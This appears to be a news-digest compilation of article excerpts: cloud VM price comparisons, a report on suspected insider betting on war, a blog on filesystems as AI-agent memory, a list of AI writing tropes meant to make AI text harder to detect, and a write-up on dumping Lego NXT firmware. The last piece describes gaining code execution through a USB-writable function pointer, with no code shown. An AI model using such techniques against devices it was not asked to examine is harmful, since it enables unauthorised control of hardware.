I will start with the “on-demand” price quoted by every provider. While I listed monthly costs on the tables, these prices are actually charged per minute or hour, so there’s no need to reserve for a full month.
The first chart is for single-thread performance/price. I will have to separate Hetzner’s shared instances because they are not available in the US and sometimes run out even in Europe (esp. CX23), so I feel they are not exact competition - CCX13 though is available and is included.
Hetzner and Oracle top the list like last year. However, thanks to the incredible performance of Turin, Oracle pretty much matches Hetzner’s dedicated instance in performance to cost. They are followed by Linode and also GCP’s n4d. The latter, again thanks to the leading single-thread performance of AMD’s latest CPU, even manages to bring better value than DigitalOcean, which is then followed by in-house ARM solutions like Google Axion and Azure Cobalt 100.
AWS is definitely the worst value on-demand. Their Turin is the best they can do, while their previous gen and older CPUs are the worst values on the table. Unlike the previous comparison, even Azure seems to do better in value.
At this point I think we should see the limited availability Hetzner VMs in comparison to the best value dedicated:
The inexpensive shared-cpu types offer unbeatable value - if you manage to get them. The top one overall (Rome CX23) is actually the hardest to provision, as the CX23 type usually gives you a slow Skylake.
Moving on to 2x threads for evaluating multi-threaded performance:
All the non-SMT VMs get a bump here, hence Oracle’s ARM take the lead with the new AmpereOne M, with Hetzner and shared core Linode following closely. The second tier consists of Google Axion and Azure Cobalt 100, as well as DigitalOcean droplets. AWS’s non-SMT Turin is not that far behind this time, although their older gen 5/6 x86 are again at the very bottom of the chart.
The Hetzner shared-core instances get the bump as well, they provide superb on-demand value compared to the competition:
The three largest (and most expensive) providers offer significant 1-year reservation discounts. To get the maximum discount you have to lock into a specific VM type, which is why it is extra important to know what you are getting out of each. Also, for AWS you can actually automatically apply the 1 year prices to most on-demand instances by using third party services like DoIT’s Flexsave (included in their free tier!), so this segment may still be relevant even if you don’t want to reserve.
The first chart is again for single-thread performance/price.
The 1-year discount is enough for GCP’s Turin to match Oracle near the top of the value ranking. On Azure you get some good value running Cobalt 100 or Genoa. If you are on AWS, your best bet is the latest C8 family.
Moving on to evaluating multi-threaded performance using 2x vCPUs:
OCI ARM instances are still at the top, joined by Azure Cobalt 100 with Axion almost keeping up. This is the first instance where AWS can offer similar value, thanks to the C8a with the fast Turin offering twice the physical cores, making up for the higher price.
Finally, for very long term commitments, AWS, GCP and Azure provide 3-year reserved discounts:
GCP with its Turin instances finally comes just ahead of Oracle and even Hetzner’s dedicated VM. Azure also provides good value with their Cobalt 100 and Turin types. It should be noted that even if AWS lags behind the others, at a 3 year commitment it still offers better value than the “classic” value providers Akamai and DigitalOcean.
Switching to multi-thread, the number of physical cores per vCPU makes the difference:
I didn’t expect this, but Azure Cobalt 100 tops the chart! It is followed by GCP and OCI ARM solutions, but AWS’s and GCP’s Turin are not far behind.
The large providers (AWS, GCP, Azure, OCI) offer their spare VM capacity at an - often heavy - discount, with the understanding that these instances can be reclaimed at any time when needed by other customers. This “spot” or “preemptible” VM instance pricing is by far the most cost-effective way to add compute to your cloud. Obviously, it is not applicable to all use cases, but if you have a fault-tolerant workload or can gracefully interrupt your processing and rebuild your server to continue, this might be for you.
AWS and OCI will give you a 2-minute warning before your instance is terminated. Azure and GCP will give you 30 seconds, which should still be enough for many use cases (e.g. web servers, batch processing etc).
The discount for Oracle’s instances is fixed at 50%, but varies wildly for the other providers per region and can change often, so you have to be on top of it to adjust your instance types accordingly.
For a longer discussion on spot instances see 2023’s spot performance/price comparison. Then you can come back to this year’s results below.
Applying the lowest January 2026 US spot prices we get:
...
Read the original on devblog.ecuadors.net »
Ayatollah Ali Khamenei was not, it’s safe to assume, a devoted Polymarket user. If he had been, the Iranian leader might still be alive. Hours before Khamenei’s compound in Tehran was reduced to rubble last week, an account under the username “magamyman” bet about $20,000 that the supreme leader would no longer be in power by the end of March. Polymarket placed the odds at just 14 percent, netting “magamyman” a profit of more than $120,000.
Everyone knew that an attack might be in the works—some American aircraft carriers had already been deployed to the Middle East weeks ago—but the Iranian government was caught off guard by the timing. Although the ayatollah surely was aware of the risks to his life, he presumably did not know that he would be targeted on this particular Saturday morning. Yet on Polymarket, plenty of warning signs pointed to an impending attack. The day before, 150 users bet at least $1,000 that the United States would strike Iran within the next 24 hours, according to a New York Times analysis. Until then, few people on the platform were betting that kind of money on an immediate attack.
Maybe all of this sounds eerily familiar. In January, someone on Polymarket made a series of suspiciously well-timed bets right before the U. S. attacked a foreign country and deposed its leader. By the time Nicolás Maduro was extracted from Venezuela and flown to New York, the user had pocketed more than $400,000. Perhaps this trader and the Iran bettors who are now flush with cash simply had the luck of a lifetime—the gambling equivalent of making a half-court shot. Or maybe they knew what was happening ahead of time and flipped it for easy money. We simply do not know.
Polymarket traders swap crypto, not cash, and conceal their identities through the blockchain. Even so, investigations into insider trading are already underway: Last month, Israel charged a military reservist for allegedly using classified information to make unspecified bets on Polymarket.
The platform forbids illegal activity, which includes insider trading in the U.S. But with a few taps on a smartphone, anyone with privileged knowledge can now make a quick buck (or a hundred thousand). Polymarket and other prediction markets—the sanitized, industry-favored term for sites that let you wager on just about anything—have been dogged by accusations of insider trading in markets of all flavors. How did a Polymarket user know that Lady Gaga, Cardi B, and Ricky Martin would make surprise appearances during the Super Bowl halftime show, but that Drake and Travis Scott wouldn’t? Shady bets on war are even stranger and more disturbing. They risk unleashing an entirely new kind of national-security threat. The U.S. caught a break: The Venezuela and Iran strikes were not thwarted by insider traders whose bets could have prompted swift retaliation. The next time, we may not be so lucky.
The attacks in Venezuela and Iran—like so many military campaigns—were conducted under the guise of secrecy. You don’t swoop in on an adversary when they know you are coming. The Venezuela raid was reportedly so confidential that Pentagon officials did not know about its exact timing until a few hours before President Trump gave the orders.
Any insiders who put money down on impending war may not have thought that they were giving anything away. An anonymous bet that reeks of insider trading is not always easy to spot in the moment. After the suspicious Polymarket bets on the Venezuela raid, the site’s forecast placed the odds that Maduro would be ousted at roughly 10 percent. Even if Maduro and his team had been glued to Polymarket, it’s hard to imagine that such long odds would have compelled him to flee in the middle of the night. And even with so many people betting last Friday on an imminent strike in Iran, Polymarket forecasted only a 26 percent chance, at most, of an attack the next day. What’s the signal, and what’s the noise?
In both cases, someone adept at parsing prediction markets could have known that something was up. “It’s possible to spot these bets ahead of time,” Rajiv Sethi, a Barnard College economist who studies prediction markets, told me. There are some telltale behaviors that could help distinguish a military contractor betting off a state secret from a college student mindlessly scrolling on his phone after one too many cans of Celsius. Someone who’s using a newly created account to wager a lot of money against the conventional wisdom is probably the former, not the latter. And spotting these kinds of suspicious bettors is only getting easier. The prediction-market boom has created a cottage industry of tools that instantaneously flag potential insider trading—not for legal purposes but so that you, too, can profit off of what the select few already know.
Unlike Kalshi, the other big prediction-market platform, Polymarket can be used in the U.S. only through a virtual private network, or VPN. In effect, the site is able to skirt regulations that require tracking the identities of its customers and reporting shady bets to the government. In some ways, insider trading seems to be the whole point: “What’s cool about Polymarket is that it creates this financial incentive for people to go and divulge the information to the market,” Shayne Coplan, the company’s 27-year-old CEO, said in an interview last year. (Polymarket did not respond to a request for comment.)
Consider if the Islamic Revolutionary Guard Corps had paid the monthly fee for a service that flagged relevant activity on Polymarket two hours before the strike. The supreme leader might not have hosted in-person meetings with his top advisers where they were easy targets for missiles. Perhaps Iran would have launched its own preemptive strikes, targeting military bases across the Middle East. Six American service members have already died from Iran’s drone attacks in the region; the death toll could have been higher if Iran had struck first. In other words, someone’s idea of a get-rich-quick scheme may have ended with a military raid gone horribly awry. (The Department of Defense did not respond to a request for comment.)
Maybe this all sounds far-fetched, but it shouldn’t. “Any advance notice to an adversary is problematic,” Alex Goldenberg, a fellow at the Rutgers Miller Center who has written about war markets, told me. “And these predictive markets, as they stand, are designed to leak out this information.” In all likelihood, he added, intelligence agencies across the world are already paying attention to Polymarket. Last year, the military’s bulletin for intelligence professionals published an article advocating for the armed forces to integrate data from Polymarket to “more fully anticipate national security threats.” After all, the Pentagon already has some experience with prediction markets. During the War on Terror, DARPA toyed with creating what it billed the “Policy Analysis Market,” a site that would let anonymous traders bet on world events to forecast terrorist attacks and coups. (Democrats in Congress revolted, and the site was quickly canned.)
Now every adversary and terrorist group in the world can easily access war markets that are far more advanced than what the DOD ginned up two decades ago. What makes Polymarket’s entrance into warfare so troubling is not just potential insider trading from users like “magamyman.” If governments are eyeing Polymarket for signs of an impending attack, they can also be led astray. A government or another sophisticated actor wouldn’t need to spend much money to massively swing the Polymarket odds on whether a Gulf state will imminently strike Iran—breeding panic and paranoia. More fundamentally, prediction markets risk warping the basic incentives of war, Goldenberg said. He gave the example of a Ukrainian military commander making less than $1,000 a month, who could place bets that go against his own military’s objective. “Maybe you choose to retreat a day early because you can double, triple, or quadruple your money and then send that back to your family,” he said.
Again, we don’t know for sure whether any of this is happening. That may be the scariest part. As long as Polymarket lets anyone bet on war anonymously, we may never know. Last Saturday, the day of the initial Iran attack, Polymarket processed a record $478 million in bets, according to one analysis. All the while, Polymarket continues to wedge itself into the mainstream. Substack recently struck a partnership with Polymarket to incorporate the platform’s forecasts into its newsletters. (“Journalism is better when it’s backed by live markets,” Polymarket posted on X in announcing the deal.) All of this makes the site even more valuable as an intelligence asset, and even more destructive for the rest of us. Polymarket keeps launching more war markets: Will the U. S. strike Iraq? Will Israel strike Beirut? Will Iran strike Cyprus? Somewhere out there, someone likely already knows the answers.
...
Read the original on www.theatlantic.com »
I used to work at a vector database company. My entire job was helping people understand why they needed a database purpose-built for AI; embeddings, semantic search, the whole thing. So it’s a little funny that I’m writing this. But here I am, watching everyone in the AI ecosystem suddenly rediscover the humble filesystem, and I think they might be onto something bigger than most people realize.
Not bigger than databases. Different from databases. I need to say that upfront because I already know someone is going to read this and think I’m saying “files good, databases bad.” I’m not. Stay with me.
If you’ve been paying any attention to the AI agent space over the last few months, you’ve noticed something strange. LlamaIndex published “Files Are All You Need.” LangChain wrote about how agents can use filesystems for context engineering. Oracle, yes Oracle (who is cooking btw), put out a piece comparing filesystems and databases for agent memory. Dan Abramov wrote about a social filesystem built on the AT Protocol. Archil is building cloud volumes specifically because agents want POSIX file systems.
Jerry Liu from LlamaIndex put it bluntly: instead of one agent with hundreds of tools, we’re moving toward a world where the agent has access to a filesystem and maybe 5-10 tools. That’s it. Filesystem, code interpreter, web access. And that’s as general as, if not more general than, an agent with 100+ MCP tools.
Karpathy made the adjacent observation that stuck with me. He pointed out that Claude Code works because it runs on your computer, with your environment, your data, your context. It’s not a website you go to — it’s a little spirit that lives on your machine. OpenAI got this wrong, he argued, by focusing on cloud deployments in containers orchestrated from ChatGPT instead of simply running on localhost.
And here’s the thing that makes all of this matter commercially: coding agents make up the majority of actual AI use cases right now. Anthropic is reportedly approaching profitability, and a huge chunk of that is driven by Claude Code, a CLI tool. Not a chatbot. A tool that reads and writes files on your filesystem.
Here’s where I think most of the discourse misses the deeper point.
Memory, in the human, psychological sense, is fundamental to how we function. We don’t re-read our entire life story every time we make a decision. We have long-term storage, selective recall, the ability to forget things that don’t matter and surface things that do. Context windows in LLMs are none of that. They’re more like a whiteboard that someone keeps erasing.
If you’ve used Claude Code for any real project, you know the dread of watching that “context left until auto-compact” notification creep closer. Your entire conversation, all the context the agent has built up about your codebase, your preferences, your decisions, all about to be compressed or lost.
Filesystems solve this in the most boring, obvious way possible. Write things down. Put them in files. Read them back when you need them. Claude’s CLAUDE.md file gives the agent persistent context about your project. Cursor stores past chat history as searchable files. People are writing aboutme.md files that act as portable identity descriptors any agent can read: your preferences, your skills, your working style, all in a file that moves between applications without anyone needing to coordinate an API.
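To make that concrete, here is a minimal sketch of the pattern; the aboutme.md name comes from the post, but the helper functions are hypothetical:

from pathlib import Path

MEMORY_FILE = Path("aboutme.md")  # hypothetical persistent-context file

def remember(note: str) -> None:
    # Append one fact; any agent that can read markdown can use it later.
    with MEMORY_FILE.open("a", encoding="utf-8") as f:
        f.write(f"- {note}\n")

def recall() -> str:
    # Read the whole file back, e.g. to prepend to an agent's prompt.
    return MEMORY_FILE.read_text(encoding="utf-8") if MEMORY_FILE.exists() else ""

remember("Prefers concise answers; works mostly in TypeScript.")

That’s the entire trick: no database, no API, just a file any tool can open.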
Except! It might not be quite that simple.
A recent paper from ETH Zürich evaluated whether these repository-level context files actually help coding agents complete tasks. The finding was counterintuitive: across multiple agents and models, context files tended to reduce task success rates while increasing inference cost by over 20%. Agents given context files explored more broadly, ran more tests, traversed more files — but all that thoroughness delayed them from actually reaching the code that needed fixing. The files acted like a checklist that agents took too seriously.
This sounds like it undermines the whole premise. But I think it actually sharpens it. The paper’s conclusion wasn’t “don’t use context files.” It was that unnecessary requirements make tasks harder, and context files should describe only minimal requirements. The problem isn’t the filesystem as a persistence layer. The problem is people treating CLAUDE.md like a 2,000-word onboarding document instead of a concise set of constraints. Which brings us to the question of standards.
Right now we have CLAUDE.md, AGENTS.md, copilot-instructions.md, .cursorrules, and probably five more by the time you read this. Everyone agrees that agents need persistent filesystem-based context. Nobody agrees on what the file should be called or what should go in it. I see efforts to consolidate; this is good.
Dan Abramov’s piece on a social filesystem crystallized something important here. He describes how the AT Protocol treats user data as files in a personal repository: structured, owned by the user, readable by any app that speaks the format. The critical design choice is that different apps don’t need to agree on what a “post” is. They just need to namespace their formats (using domain names, like Java packages) so they don’t collide. Apps are reactive to files. Every app’s database becomes derived data: a cached materialized view of everybody’s folders.
The same tension exists in the agent context file space. We don’t need CLAUDE.md and AGENTS.md and copilot-instructions.md to converge into one file. We need them to coexist without collision. And to be fair, some convergence is happening. Anthropic released Agent Skills as an open standard, a SKILL.md format that Microsoft, OpenAI, Atlassian, GitHub, and Cursor have all adopted. A skill you write for Claude Code works in Codex, works in Copilot. The file format is the API.
NanoClaw, a lightweight personal AI assistant framework, takes this to its logical conclusion. Instead of building an ever-expanding feature set, it uses a “skills over features” model. Want Telegram support? There’s no Telegram module. There’s a /add-telegram skill, essentially a markdown file that teaches Claude Code how to rewrite your installation to add the integration. Skills are just files. They’re portable, auditable, and composable. No MCP server required. No plugin marketplace to browse. Just a folder with a SKILL.md in it.
This is interoperability without coordination. And I want to be specific about what I mean by that, because it’s a strong claim. In tech, getting two competing products to work together usually requires either a formal standard that takes years to ratify, or a dominant platform that forces compatibility. Files sidestep both. If two apps can read markdown, they can share context. If they both understand the SKILL.md format, they can share capabilities. Nobody had to sign a partnership agreement. Nobody had to attend a standards body meeting. The file format does the coordinating.
There’s a useful analogy from infrastructure. Traditional data architectures were designed around the assumption that storage was the bottleneck. The CPU waited for data from memory or disk, and computation was essentially reactive to whatever storage made available. But as processing power outpaced storage I/O, the paradigm shifted. The industry moved toward decoupling storage and compute, letting each scale independently, which is how we ended up with architectures like S3 plus ephemeral compute clusters. The bottleneck moved, and everything reorganized around the new constraint.
Something similar is happening with AI agents. The bottleneck isn’t model capability or compute. It’s context. Models are smart enough. They’re just forgetful. And filesystems, for all their simplicity, are an incredibly effective way to manage persistent context at the exact point where the agent runs — on the developer’s machine, in their environment, with their data already there.
Now, I’d be a fraud if I didn’t acknowledge the tension here. Someone on Twitter joked that “all of you saying you don’t need a graph for agents while using the filesystem are just in denial about using a graph.” And… they’re not wrong. A filesystem is a tree structure. Directories, subdirectories, files: a directed acyclic graph. When your agent runs ls, grep, reads a file, follows a reference to another file, it’s traversing a graph.
Richmond in Oracle’s piece made the sharpest distinction I’ve seen: filesystems are winning as an interface, databases are winning as a substrate. The moment you want concurrent access, semantic search at scale, deduplication, recency weighting — you end up building your own indexes. Which is, let’s be honest, basically a database.
Having worked at Weaviate, I can tell you that this isn’t an either/or situation. The file interface is powerful because it’s universal and LLMs already understand it. The database substrate is powerful because it provides the guarantees you need when things get real. The interesting future isn’t files versus databases. It’s files as the interface humans and agents interact with, backed by whatever substrate makes sense for the use case.
Here’s my actual take on all of this, the thing I think people are dancing around but not saying directly.
Filesystems can redefine what personal computing means in the age of AI.
Not in the “everything runs locally” sense (but maybe?). In the sense that your data, your context, your preferences, your skills, your memory — lives in a format you own, that any agent can read, that isn’t locked inside a specific application. Your aboutme.md works with your flavour of OpenClaw/NanoClaw today and whatever comes tomorrow. Your skills files are portable. Your project context persists across tools.
This is what personal computing was supposed to be before everything moved into walled-garden SaaS apps and proprietary databases. Files are the original open protocol. And now that AI agents are becoming the primary interface to computing, files are becoming the interoperability layer that makes it possible to switch tools, compose workflows, and maintain continuity across applications, all without anyone’s permission.
I’ll admit this is a bit idealistic. The history of open formats is littered with standards that won on paper and lost in practice. Companies have strong incentives to make their context files just different enough that switching costs remain high. The fact that we already have CLAUDE.md and AGENTS.md and .cursorrules coexisting rather than one universal format is evidence that fragmentation is the default, not the exception. And the ETH Zürich paper is a reminder that even when the format exists, writing good context files is harder than it sounds. Most people will write bad ones, and bad context files are apparently worse than none at all.
But I keep coming back to something Dan Abramov wrote: our memories, our thoughts, our designs should outlive the software we used to create them. That’s not a technical argument. It’s a values argument. And it’s one that the filesystem, for all its age and simplicity, is uniquely positioned to serve. Not because it’s the best technology. But because it’s the one technology that already belongs to you.
...
Read the original on madalitso.me »
A single file containing all cataloged AI writing tropes. Add it to your AI’s system prompt to help it avoid these patterns (let’s play cat and mouse!).
Disclaimer: Creation of this file was AI-assisted. If you thought I was going to write out a .md file for AI myself you must be mad. AI for AI. Human for Human.
# AI Writing Tropes to Avoid
Add this file to your AI assistant’s system prompt or context to help it avoid
common AI writing patterns. Source: tropes.fyi
## Word Choice
### “Quietly” and Other Magic Adverbs
Overuse of “quietly” and similar adverbs to convey subtle importance or understated power. AI reaches for these adverbs to make mundane descriptions feel significant. Also includes: “deeply”, “fundamentally”, “remarkably”, “arguably”.
**Avoid patterns like:**
- “quietly orchestrating workflows, decisions, and interactions”
- “the one that quietly suffocates everything else”
- “a quiet intelligence behind it”
### “Delve” and Friends
Used to be the most infamous AI tell. “Delve” went from an uncommon English word to appearing in a staggering percentage of AI-generated text. Part of a family of overused AI vocabulary including “certainly”, “utilize”, “leverage” (as a verb), “robust”, “streamline”, and “harness”.
**Avoid patterns like:**
- “Let’s delve into the details…”
- “Delving deeper into this topic…”
- “We certainly need to leverage these robust frameworks…”
### “Tapestry” and “Landscape”
Overuse of ornate or grandiose nouns where simpler words would do. “Tapestry” is used to describe anything interconnected. “Landscape” is used to describe any field or domain. Other offenders: “paradigm”, “synergy”, “ecosystem”, “framework”.
**Avoid patterns like:**
- “The rich tapestry of human experience…”
- “Navigating the complex landscape of modern AI…”
- “The ever-evolving landscape of technology…”
### The “Serves As” Dodge
Replacing simple “is” or “are” with pompous alternatives like “serves as”, “stands as”, “marks”, or “represents”. AI avoids basic copulas because its repetition penalty pushes it toward fancier constructions (I’ve studied this!).
**Avoid patterns like:**
- “The building serves as a reminder of the city’s heritage.”
- “Gallery 825 serves as LAAA’s exhibition space for contemporary art.”
- “The station marks a pivotal moment in the evolution of regional transit.”
## Sentence Structure
### Negative Parallelism
The “It’s not X — it’s Y” pattern, often with an em dash. The single most commonly identified AI writing tell. Man I f*cking hate it. AI uses this to create false profundity by framing everything as a surprising reframe. One in a piece can be effective; ten in a blog post is a genuine insult to the reader. Before LLMs, people simply did not write like this at scale. Includes the causal variant “not because X, but because Y” where every explanation is framed as a surprise reveal.
**Avoid patterns like:**
- “It’s not bold. It’s backwards.”
- “Feeding isn’t nutrition. It’s dialysis.”
- “Half the bugs you chase aren’t in your code. They’re in your head.”
### “Not X. Not Y. Just Z.”
The dramatic countdown pattern. AI builds tension by negating two or more things before revealing the actual point. Creates a false sense of narrowing down to the truth.
**Avoid patterns like:**
- “Not a bug. Not a feature. A fundamental design flaw.”
- “Not ten. Not fifty. Five hundred and twenty-three lint violations across 67 files.”
- “not recklessly, not completely, but enough”
### “The X? A Y.”
Self-posed rhetorical questions answered immediately in the next sentence or clause. The model asks a question nobody was asking, then answers it for dramatic effect. Thinks this is the epitome of great writing.
**Avoid patterns like:**
- “The result? Devastating.”
- “The worst part? Nobody saw it coming.”
- “The scary part? This attack vector is perfect for developers.”
### Anaphora Abuse
Repeating the same sentence opening multiple times in quick succession.
**Avoid patterns like:**
- “They assume that users will pay… They assume that developers will build… They assume that ecosystems will emerge… They assume that…”
- “They could expose… They could offer… They could provide… They could create… They could let… They could unlock…”
- “They have built engines, but not vehicles. They have built power, but not leverage. They have built walls, but not doors.”
### Tricolon Abuse
Overuse of the rule-of-three pattern, often extended to four or five. A single tricolon is elegant; three back-to-back tricolons are a pattern recognition failure.
**Avoid patterns like:**
- “Products impress people; platforms empower them. Products solve problems; platforms create worlds. Products scale linearly; platforms scale exponentially.”
- “identity, payments, compute, distribution”
- “workflows, decisions, and interactions”
### “It’s Worth Noting”
Filler transitions that signal nothing. AI uses these phrases to introduce new points without actually connecting them to the previous argument. Also includes: “It bears mentioning”, “Importantly”, “Interestingly”, “Notably”.
**Avoid patterns like:**
- “It’s worth noting that this approach has limitations.”
- “Importantly, we must consider the broader implications.”
- “Interestingly, this pattern repeats across industries.”
### Superficial Analyses
Tacking a present participle (“-ing”) phrase onto the end of a sentence to inject shallow analysis that says nothing. The model attaches significance, legacy, or broader meaning to mundane facts using phrases like “highlighting its importance”, “reflecting broader trends”, or “contributing to the development of…”.
**Avoid patterns like:**
- “contributing to the region’s rich cultural heritage”
- “This etymology highlights the enduring legacy of the community’s resistance and the transformative power of unity in shaping its identity.”
- “underscoring its role as a dynamic hub of activity and culture”
### False Ranges
Using “from X to Y” constructions where X and Y aren’t on any real scale. In legitimate use, “from X to Y” implies a spectrum with a meaningful middle. AI uses it as a fancy way to list two loosely related things. “From innovation to cultural transformation” — what’s in between???? Nothing!
**Avoid patterns like:**
- “From innovation to implementation to cultural transformation.”
- “From the singularity of the Big Bang to the grand cosmic web.”
- “From problem-solving and tool-making to scientific discovery, artistic expression, and technological innovation.”
### Gerund Fragment Litany
After making a claim, AI illustrates it with a stream of verbless gerund fragments — standalone sentences with no grammatical subject. “Fixing small bugs. Writing straightforward features. Implementing well-defined tickets.” The first sentence already said everything. The fragments add nothing except word count and that familiar AI cadence. Humans don’t write first drafts this way. It’s a pure structural tic.
**Avoid patterns like:**
- “Fixing small bugs. Writing straightforward features. Implementing well-defined tickets.”
- “Reviewing pull requests. Debugging edge cases. Attending architecture meetings.”
- “Shipping faster. Moving quicker. Delivering more.”
## Paragraph Structure
### Short Punchy Fragments
Excessive use of very short sentences or sentence fragments as standalone paragraphs for manufactured emphasis. RLHF training has pushed models toward “writing for readability” aimed at the lowest common denominator: one thought per sentence, no mental state-keeping required. It’s an inhuman style. No real person writes first drafts this way because it doesn’t match how humans think or speak.
**Avoid patterns like:**
- “He published this. Openly. In a book. As a priest.”
- “These weren’t just products. And the software side matched. Then it professionalised. But I adapted.”
- “Platforms do.”
### Listicle in a Trench Coat
Numbered or labeled points dressed up as continuous prose. The model writes what is essentially a listicle but wraps each point in a paragraph that starts with “The first… The second… The third…” to disguise the format. Perhaps you told it to stop generating lists and it decided to do this instead… still very common.
**Avoid patterns like:**
- “The first wall is the absence of a free, scoped API… The second wall is the lack of delegated access… The third wall is the absence of scoped permissions…”
- “The second takeaway is that… The third takeaway is that… The fourth takeaway is that…”
## Tone
### “Here’s the Kicker”
False suspense transitions that promise a revelation but deliver a point that did NOT need the buildup. The model uses these phrases to manufacture drama before an otherwise unremarkable observation LOL. Also includes: “Here’s the thing”, “Here’s where it gets interesting”, “Here’s what most people miss”.
...
Read the original on tropes.fyi »
Dumping Lego NXT firmware off of an existing brick
I’ve recently been contributing to the Pybricks project, a community-run port of MicroPython to Lego Mindstorms hardware. As part of that, I obtained a used Lego NXT which just so happened to still be running the original version 1.01 firmware from when it launched in 2006. I wanted to archive a copy of this firmware, and doing so happened to involve the discovery of arbitrary code execution.
The NXT is a relatively simple exploitation target and can serve as a good introduction to ARM and embedded exploit development.
Or, in the words of a much more innocent era, “Google is your friend”.
“Surely somebody must’ve already archived a copy of this firmware, right?” I thought to myself. Unfortunately, this does not appear to have been the case. I searched but never came across a copy of this particular firmware version despite the extensive NXT enthusiast community.
I did come across a mention of a 1.03 firmware which appears to have been released on or very close to launch day. I suspect that enthusiasts and advanced users likely eagerly switched to newer and/or community-modified firmwares when they wanted newer features.
The NXT is also old enough that, despite being part of “the Internet era”, resources are starting to bitrot.
Looks like I’m going to have to figure out how to retrieve a copy myself!
The first idea which came to mind for backing up firmware is “does the tool which is used to download new firmware to the NXT also allow retrieving the preexisting firmware?”
From sources including the Wikipedia page, we find that the NXT is built around a Microchip (formerly Atmel) AT91SAM7S256 microcontroller, a distant ancestor of the SAM D parts that now power several Arduino, MicroPython, and CircuitPython boards. This chip contains a built-in bootloader program called SAM-BA which supports simple “read from memory” (traditionally known as PEEK) and “write to memory” (traditionally known as POKE) commands. This (deceptively!) seems like it’d work!
Fortunately, while researching, I found out that somebody did try this already and was unsuccessful. Attempting to enter the SAM-BA bootloader appears to automatically overwrite part of the firmware which we want to back up. Good thing I did my research first! We have to find a different approach that doesn’t involve entering firmware update mode.
JTAG is a hardware interface used for providing all sorts of “debug” and “test” functionality for circuit boards and chips. Precisely what can be done using JTAG varies greatly, but the microcontroller in the NXT allows JTAG to read and modify all of the CPU’s state for debugging. This can be used to read back data stored inside the chip.
Is this related to using JTAG to hack an Xbox or a mobile phone?
Yes! Those devices also use the same low-level protocol known as JTAG. However, the debug and test commands which can be used on top of JTAG are completely different. Think of JTAG as being similar to TCP or UDP while the chip-specific commands are higher-level protocols such as HTTP or SSH.
Unfortunately, since this is a hardware interface, using it involves taking apart the NXT and soldering to it (since the necessary connectors are not installed). Additionally, this chip is so old that its debug interface is cumbersome to set up and use (it supports none of the interfaces and protocols that the cheap modern tools are designed for).
I considered this method a last resort but really wanted to find a software-only solution. Software-only solutions are generally easier to share and deploy, so finding one would allow many other people to also back up the firmware of bricks in their possession.
For a device like the NXT which already allows for limited user-programmability, the first instinct is usually to explore what this limited or “sandboxed” environment allows you to do. How do NXT programs work? Can we just write an NXT program that dumps the firmware and sends it to the computer?
If we hunt around, we can find the “LEGO MINDSTORMS NXT Executable File Specification” which explains that NXT programs run in a bytecode virtual machine and don’t have the ability to read/write arbitrary memory. Variables are restricted to a “data segment” of fixed size, and all memory accesses must be inside it. This means that we cannot “just” write an NXT program (unless we find a bug in the VM which allows us to access memory we’re not supposed to).
What is the difference between a VM and “native” code?
“Native” code refers to code which a CPU can directly run. A virtual machine is a way of adding a layer of indirection between a program and the real CPU. Computer scientists love solving problems by adding indirection, and a virtual machine can be used to solve problems such as incompatibility, convenience, and/or security.
For example, a virtual machine can be used to take code designed for one type of CPU and run it on a different type of CPU. This is often called an emulator, and they can be useful when it isn’t possible to recompile the code for the new CPU (such as if the original program is a closed-source video game for a proprietary game console but you want to run it on a desktop PC).
Java and .NET run on virtual machines which are specifically designed so that managing memory is more convenient (such as by having garbage collection). They can also be used to implement security by funneling “dangerous” operations into specific, limited pathways. The NXT’s virtual machine is a virtual machine of this type.
For those who aren’t aware, the source code of the NXT firmware is publicly available! However, many links to it have bitrotted, source code only seems to have been released for some versions (certainly not every), and it’s not even clear which versions of the code have been archived and still exist. (For example, the seemingly-official LEGO-Robotics/NXT-Firmware repository on GitHub… is actually a community-modified firmware! Its history also only contains versions 1.05 and 1.29 specifically and not, for example, the final 1.31 or the original 1.01.)
Nonetheless, we can still study it to see if we can find anything interesting. At the same time, we can also study a copy of the NXT Bluetooth Developer Kit in order to understand how the computer communicates with the brick. (Despite being the “Bluetooth” developer kit, the documented protocol and commands are used over USB as well.)
From reading through the “LEGO MINDSTORMS NXT Communication Protocol” and “LEGO MINDSTORMS NXT Direct Commands” documents, we start to see the following high-level overview:
The protocol contains two categories of commands, “system” and “direct”. System commands vaguely relate to “operating system” functionality, and direct commands vaguely relate to “actually operating a robot”. In general, this protocol also seems to specifically not allow performing arbitrary operations and badness such as accessing the firmware or getting native code execution outside of the VM. It appears to be designed to give friendly access to only the NXT’s virtual filesystem and bytecode interpreter.
Since both the VM and the communications protocol appear to be designed to keep us out, it’s starting to look like we’re going to need to find some kind of exploit.
While looking through all of these documents, I generally focused my attention on “low-level” functionality, as it is much more likely to contain the ability to access the firmware and/or arbitrary memory. One feature, “IO-Maps”, immediately stood out.
In the NXT Communication Protocol document, IO-Maps are described as “the well-described layer between the different controllers/drivers stack and the VM running the user’s code.” That sounds potentially interesting if it allows access to drivers in ways which aren’t normally allowed. Also, if this is an interface which isn’t normally used, it is a potential location for unexpected and exploitable bugs.
So… where does one find the so-called “well-described” description of what IO-Maps can do?
One of the best explanations I found was an old copy of the NXC programmer’s guide. NXC (Not eXactly C) is an alternative frontend for creating NXT programs for the stock firmware in a C-like language rather than graphical blocks. This programmer’s guide lists all of the IO-Map offsets for each firmware module, and the explanations make it clear that IO-Maps contain essentially all of each module’s internal state.
Further searching finds this blog post explaining how it’s possible to watch and plot variables in the user program by reading from the VM module’s IO-Map. It definitely feels like we could be on to something here!
How do you find the IO-Map structures in the firmware source code? That blog post lists a struct, but where is said struct?
It turns out that all IO-Maps are defined in .iom files in the firmware, with the VM’s being defined in c_cmd.iom.
Without even having to look at any other modules, we can already spot something: the VM IO-Map contains a function pointer pRCHandler! What does this function pointer do?
It turns out that this is the command handler for “direct” commands!
Is this… really just a native code function pointer sitting inside this IO-Map structure which is both readable and writable over USB?
What is a function pointer? Why is finding a function pointer such a big deal?
A function pointer is a piece of data which stores the location of some code. A program uses this data to decide what code to run next. Programs themselves can modify function pointers in order to alter their functionality as they run, but, if we can modify the function pointer, we can also alter what the program does, including in ways that may be unintended.
In order to try out whether this even has a chance of working, we will need to send commands to the NXT over USB. This can be done in many different ways, but here we will use the Python programming language. Python is very suitable for testing and prototyping because it has a REPL and many third-party libraries implementing functionality that we can reuse. In this case, we will use the PyUSB library to talk to the NXT.
Setting up Python, creating a virtualenv, installing PyUSB, installing USB drivers, and configuring USB permissions will all be left as an exercise for the reader. This is all very important, but “setting up and configuring a development environment” is a huge task all on its own, requiring tons of often-poorly-documented implicit knowledge, and I wanted to get this article done in a reasonable amount of time.
First we need to open a connection to the NXT:
